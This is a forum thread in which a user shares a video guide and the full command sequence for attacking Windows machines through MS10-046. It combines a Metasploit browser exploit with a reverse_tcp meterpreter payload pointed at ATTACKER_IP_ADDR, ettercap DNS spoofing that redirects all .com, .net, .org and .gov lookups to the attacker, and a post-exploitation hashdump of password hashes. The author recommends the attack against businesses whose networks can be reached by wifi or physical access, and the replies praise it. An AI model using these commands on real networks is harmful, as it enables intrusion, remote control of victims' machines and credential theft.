Results 1 to 3 of 3

Thread: [Video]MS10-046 Metasploit + ettercap DNS Spoof

Hybrid View

  1. #1
    Junior Member g3ksan's Avatar
    Join Date
    Jan 2010
    Location
    Florida
    Posts
    93

    Default [Video]MS10-046 Metasploit + ettercap DNS Spoof



    I realize there are a few mistakes in this video, I was nervous and slipped up. Specifically how reverse_tcp works.

    To explain the mistake, I mentioned in the video that reverse_tcp creates a socket on the victim machine and our attacking machine will connect to that socket. This is actually how bind_tcp works. reverse_tcp creates a socket on the attacking machine and lets the victim machine connect as a client. Just wanted to make sure it's clear I know the difference I realized when I recorded it I had made a mistake, as you can probably tell by the mumbling, but I just went with it.

    I believe that this attack would work really well on medium and large sized businesses, if you can get access to the network either via wifi or by physical means. The redirect to the UNC path looks very scary, but I think most users will chalk it up to terrible IT support or weird phantom network issues.

    I appreciate any criticism, this is the first video I've made and really the first time I've posted a guide on here.

    Commands:
    MSF:
    Code:
        use windows/browser/ms10_046_shortcut_icon_dllloader
    
        set SRVHOST ATTACKER_IP_ADDR
    
        set PAYLOAD windows/meterpreter/reverse_tcp
    
        set LHOST ATTACKER_IP_ADDR
    
        exploit
    ettercap:
    Code:
        cat /usr/share/ettercap/etter.dns
        *.com A 192.168.217.133
        *.net A 192.168.217.133
        *.org A 192.168.217.133
        *.gov A 192.168.217.133
    Code:
        ettercap -T -q -i eth0 -P dns_spoof // //
    MSF post exploitation:
    Code:
        sessions -i 1
    
        use priv
    
        hashdump
    This is the sixth time we have created a thread about it... and we have become exceedingly efficient at it.

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: [Video]MS10-046 Metasploit + ettercap DNS Spoof

    Pretty nice
    The true reason I like it is that you used the dns_spoof from ettercap to make it easier, most people just go to the specific IP which reduces the chances that it will work in a real like demo.
    You did some nice explaining even for the basic stuff :P

    Congratulations !
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Junior Member g3ksan's Avatar
    Join Date
    Jan 2010
    Location
    Florida
    Posts
    93

    Default

    Thanks, I figured people would like to see a real world example. The MSF module could be swapped out for any browser autopwn attack for this to work, so this is kind of like a template for the other browser autopwn. I'd like to incorporate some sort of ettercap filter that will allow the user, once they've been poisoned and exploited, to be able to use the internet again. This would really make this feel more "complete" to me. I'm not sure how I'd be able to do it, but I didn't really know how to use ettercap the other day and here I am.

    [edit] thanks Archangel-Amael, should of just edited it myself.
    Not bumping, but just wanted to post some relevant information related to this exploit in MSF.

    Metasploit: Exploiting DLL Hijacking Flaws explains it better than I can

    Basically what it boils down to is that the vulnerability of ms10-046 is not just IE, it's a poor programing practice involving importing external DLL files when a program opens a file that is associated with it. iTunes was vulnerable till about last week. HDM released a tool that fuzzes/enumerates programs installed on your machine for these vulnerabilities automatically and creates malicious dlls that you can import into MSF. So imagine what I did in the video, but now the attack vector has broaded due to the amount of vendors that seem to have this vulnerability in their products!

    If anyone has played with it yet, please post! I'm going to be messing around with this when I get home from work!
    Last edited by g3ksan; 08-24-2010 at 12:29 AM.
    This is the sixth time we have created a thread about it... and we have become exceedingly efficient at it.

Similar Threads

  1. Replies: 5
    Last Post: 04-03-2011, 01:54 PM
  2. Metasploit MS10-046 lnk exploit
    By The_Tiger in forum Beginners Forum
    Replies: 1
    Last Post: 08-09-2010, 01:24 PM
  3. Replies: 0
    Last Post: 03-16-2010, 01:00 PM
  4. [Video] Man In The Middle (MITM) Attack (ettercap, metasploit, sbd)
    By imported_g0tmi1k in forum OLD BT4 Videos
    Replies: 6
    Last Post: 01-16-2010, 08:47 PM
  5. Replies: 2
    Last Post: 07-08-2009, 08:56 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •